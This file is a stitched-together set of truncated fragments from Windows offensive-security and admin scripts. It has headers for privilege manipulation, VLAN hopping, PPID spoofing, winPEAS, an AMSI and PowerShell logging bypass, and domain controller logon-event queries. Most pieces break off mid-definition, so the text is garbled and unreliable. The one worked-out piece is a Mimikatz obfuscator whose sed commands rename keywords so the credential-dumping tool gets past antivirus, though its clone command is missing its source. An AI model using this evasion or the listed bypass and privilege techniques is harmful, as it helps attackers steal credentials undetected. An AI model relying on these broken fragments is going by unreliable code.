#include <windows.h>
#include <iostream>
#include <Lmcons.h>
#include <cstdio>
#include <tlhelp32.h>
BOOL SetPrivilege(
HANDLE hToken, // access token handle
LPCTSTR lpszPrivilege, // name of privilege to enable/disable
BOOL bEnablePrivilege // to enable or disable privilege
using System;
using System.IO;
using System.Text;
using System.IO.Pipes;
using System.Threading;
using System.Diagnostics;
using System.Security.Principal;
using System.Security.AccessControl;
using System.Runtime.InteropServices;
using System.ComponentModel;
# This script performs DTP trunk-mode detection and a VLAN hopping attack
# automatically, then runs a sniffer afterwards to collect traffic from any
# other VLANs that become reachable.
# It works best in a Unix/Linux environment because it relies on the
# following components:
# - 8021q.ko
function Run-SecurePS
$PPIDSpoofBlock = @"
winPEAS in powershell
function Invoke-winPEAS
Param (
[Parameter(Position = 0, Mandatory = $true)]
using System;
using System.Management.Automation;
using System.Reflection;
namespace PSLoggingBypass
One of the many ways to disable PowerShell logging/AMSI when prior code execution is already available.
Author: Lee Christensen (@tifkin_)
# Reset the working variables before prompting. PowerShell variable names are
# case-insensitive, so $computer and $Computer below are the same variable.
$user = $date = $computer = $null

# Ask the operator which host to inspect.
$Computer = Read-Host -Prompt "Computername?"

# Single ICMP probe. Errors are suppressed, so $isonline is left empty when the
# host does not answer; the value is not consumed within this fragment.
$isonline = Test-Connection -ComputerName $Computer -Count 1 -ErrorAction SilentlyContinue

# Look-back window for the query that follows: 100 days before now.
$lookbackDays = 100   # choose number of days to go back
$date = (Get-Date).AddDays(-$lookbackDays)
Mimikatz Obfuscator
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions flag mimikatz based on certain keywords in the binary, such as "mimikatz" and "gentilkiwi",
# so removing them from the project before compiling gets it past most of those solutions.
# One could go further and rename functionality keywords such as "sekurlsa", "logonpasswords", "lsadump", "minidump" and "pth",
# but that also requires adapting the documentation, so it has not been done here; try it if the target's AV still detects the build after this step.
# NOTE(review): the clone source is missing from this line as captured here (only the
# target directory "windows" survived); it has to be the upstream mimikatz repository.
git clone windows
# Rename the repository's top-level mimikatz/ folder to match the substitution below.
mv windows/mimikatz windows/candycrush
# Rewrite every occurrence of the project name (lower- and upper-case) in all files under windows/.
# NOTE(review): -type f with no path filter also walks windows/.git/ (the index and packed
# refs are checksummed binary files that sed -i will corrupt) and any binary artefacts in the
# tree; exclude .git (e.g. -not -path '*/.git/*') if the working copy must stay usable with git.
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/candycrush/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g'
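# Find DC list from Active Directory (requires the ActiveDirectory module).
$DCs = Get-ADDomainController -Filter *

# Define time for report (default is 1 day).
$startDate = (Get-Date).AddDays(-1)

# Store successful logon events (ID 4624) from each DC's Security log since
# $startDate in one array.
# Fix: the original assigned $slogonevents inside the loop, so every DC
# overwrote the previous one and only the last DC's events survived. Capturing
# the loop's pipeline output keeps the events from all DCs, and @() guarantees
# an array even when zero or one event is returned.
# NOTE(review): Get-EventLog exists only in Windows PowerShell (it is absent in
# PowerShell 7+; Get-WinEvent is the replacement, see the $events query that
# follows) and reads the whole remote log before filtering client-side, which is
# slow on busy DCs. Also, 4624 on a DC records logons *to that DC*, not every
# domain authentication; 4768/4769 (Kerberos) and 4776 (NTLM) cover those — confirm
# which view the report needs.
$slogonevents = @(
    foreach ($DC in $DCs) {
        Get-EventLog -LogName Security -ComputerName $DC.Hostname -After $startDate |
            Where-Object { $_.EventID -eq 4624 }
    }
)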
$Days = 1
$events = @()
$events += Get-WinEvent -FilterHashtable @{
